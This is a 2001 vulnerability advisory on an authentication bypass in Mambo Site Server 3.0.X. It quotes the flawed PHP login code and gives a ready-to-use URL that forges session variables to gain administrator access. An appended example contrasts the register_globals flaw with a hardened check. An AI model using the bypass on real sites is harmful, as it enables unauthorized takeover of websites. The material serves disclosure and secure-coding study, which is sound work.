mambo_advisorie.txt

Published: 26 Jul 2001. Reported by: reverseonline.com. Type: packetstorm. Source: packetstormsecurity.com

Serious security flaw in Mambo Site Server 3.0.X allows unauthorized administrator access.

Serious security hole in Mambo Site Server version 3.0.X
Jul 24, 2001
by: Ismael Peinado Palomo - [email protected]
www.reverseonline.com

Summary
Mambo Site Server is a dynamic portal engine and content management tool based on PHP and MySQL.

Details
Vulnerable systems:
Mambo Site Server version 3.0.0 - 3.0.5

Immune systems:

Impact:
Any user can gain administrator privileges.

Exploits:

Under the 'administrator/' directory, index.php checks the username and password:

```php
if (isset($submit)) {
    // Look the user up by name; only administrator-type accounts qualify.
    $query = "SELECT id, password, name FROM users WHERE username='$myname' AND (usertype='administrator' OR usertype='superadministrator')";
    $result = $database->openConnectionWithReturn($query);
    if (mysql_num_rows($result) != 0) {
        list($userid, $dbpass, $fullname) = mysql_fetch_array($result);

        .....

        if (strcmp($dbpass, $pass)) {
            // if the password entered does not match the database record ask user to login again
            print "<SCRIPT>alert('Incorrect Username and Password, please try again'); document.location.href='index.php';</SCRIPT>\n";
        } else {
            // if the password matches the database
            if ($remember != "on") {
                // if the user does not want the password remembered and the cookie is set, delete the cookie
                if ($passwordcookie != "") {
                    setcookie("passwordcookie");
                    $passwordcookie = "";
                }
            }
            // set up the admin session then take the user into the admin section of the site
            session_register("myname");
            session_register("fullname");
            session_register("userid");
            print "<SCRIPT>window.open('index2.php','newwindow');</SCRIPT>\n";
            print "<SCRIPT>document.location.href='$live_site'</SCRIPT>\n";
        }
    } else {
        print "<SCRIPT>alert('Incorrect Username and Password, please try again'); document.location.href='index.php';</SCRIPT>\n";
    }
    // excerpt ends here; the outer if is closed further down in index.php
```

As we can see, if the administrator's password matches the one in the database, some variables are registered in the session and we are redirected to index2.php. So let's take a look at index2.php:

```php
if (!$PHPSESSID) {
    // No session id at all: bounce back to the login page.
    print "<SCRIPT>document.location.href='index.php'</SCRIPT>\n";
    exit(0);
} else {
    session_start();
    // Register the identity variables in the session if they are not already set.
    if (!$myname)   session_register("myname");
    if (!$fullname) session_register("fullname");
    if (!$uid)      session_register("userid");
}
```

Here the only verification that a user is valid is the global variable PHPSESSID. So if we declare that variable on the URL and also set 'myname', 'fullname' and 'userid', we can gain administrative control. Let's test:

http://target.machine/administrator/index2.php?PHPSESSID=1&myname=admin&fullname=admin&userid=administrator

BINGO!! Now we have full administrative privileges. That's a typical example of PHP hacking: it's clear that security can't rely on global variables, since they may be modified through URL parsing.

Ismael Peinado Palomo
Chief R&D Engineer
[email protected]
www.reverseonline.com
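The index2.php check from the advisory, as an added example that is not Mambo's code: the vulnerable pattern is rebuilt with extract() standing in for PHP's register_globals (the feature that turned URL parameters into the $PHPSESSID, $myname and $userid globals the advisory relies on), next to a hardened check that trusts only server-side session state written after a successful password check. The function names, the array-modelled session and the forged request are assumptions.

```php
<?php
// Added example, not Mambo's code; names are hypothetical and the session is
// modelled as a plain array so the script runs offline.

// Vulnerable form. extract() reproduces what register_globals did in 2001:
// every request parameter becomes a PHP variable, so $PHPSESSID, $myname,
// $fullname and $userid can all be supplied by the client in the URL.
function is_admin_vulnerable(array $request, array &$session): bool
{
    extract($request, EXTR_SKIP);          // same effect as register_globals=On
    if (empty($PHPSESSID)) {
        return false;                      // the only check index2.php makes
    }
    // session_register('x') on a missing session key stores global $x; with
    // register_globals that global is whatever the client sent.
    foreach (['myname', 'fullname', 'userid'] as $var) {
        if (!isset($session[$var])) {
            $session[$var] = $$var ?? null;
        }
    }
    return true;                           // caller now trusts $session['userid']
}

// Hardened login: identity is written server-side only after the password
// check succeeds. $userdb maps username => ['id' => ..., 'hash' => password_hash()].
function admin_login(array &$session, string $user, string $pass, array $userdb): bool
{
    $row = $userdb[$user] ?? null;
    if ($row === null || !password_verify($pass, $row['hash'])) {
        return false;
    }
    $session = ['admin_authenticated' => true, 'userid' => $row['id']];
    return true;
}

// Hardened check: nothing from $request is consulted, and the flag can only
// have been set by admin_login(), so a forged query string changes nothing.
function is_admin_hardened(array $request, array $session): bool
{
    return ($session['admin_authenticated'] ?? false) === true
        && isset($session['userid']);
}

// Constructed forged request carrying the same parameters as the advisory's URL.
$forged = ['PHPSESSID' => '1', 'myname' => 'admin', 'fullname' => 'admin',
           'userid' => 'administrator'];
$s = [];
printf("vulnerable check accepts forged request: %s\n", is_admin_vulnerable($forged, $s) ? 'yes' : 'no');
printf("hardened check accepts forged request: %s\n", is_admin_hardened($forged, []) ? 'yes' : 'no');
```

The same bug resurfaces in modern PHP whenever extract($_REQUEST) or similar is used on request data, so the hardened form is what to look for in review.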

Vulners AI Score: 7.4 (High risk)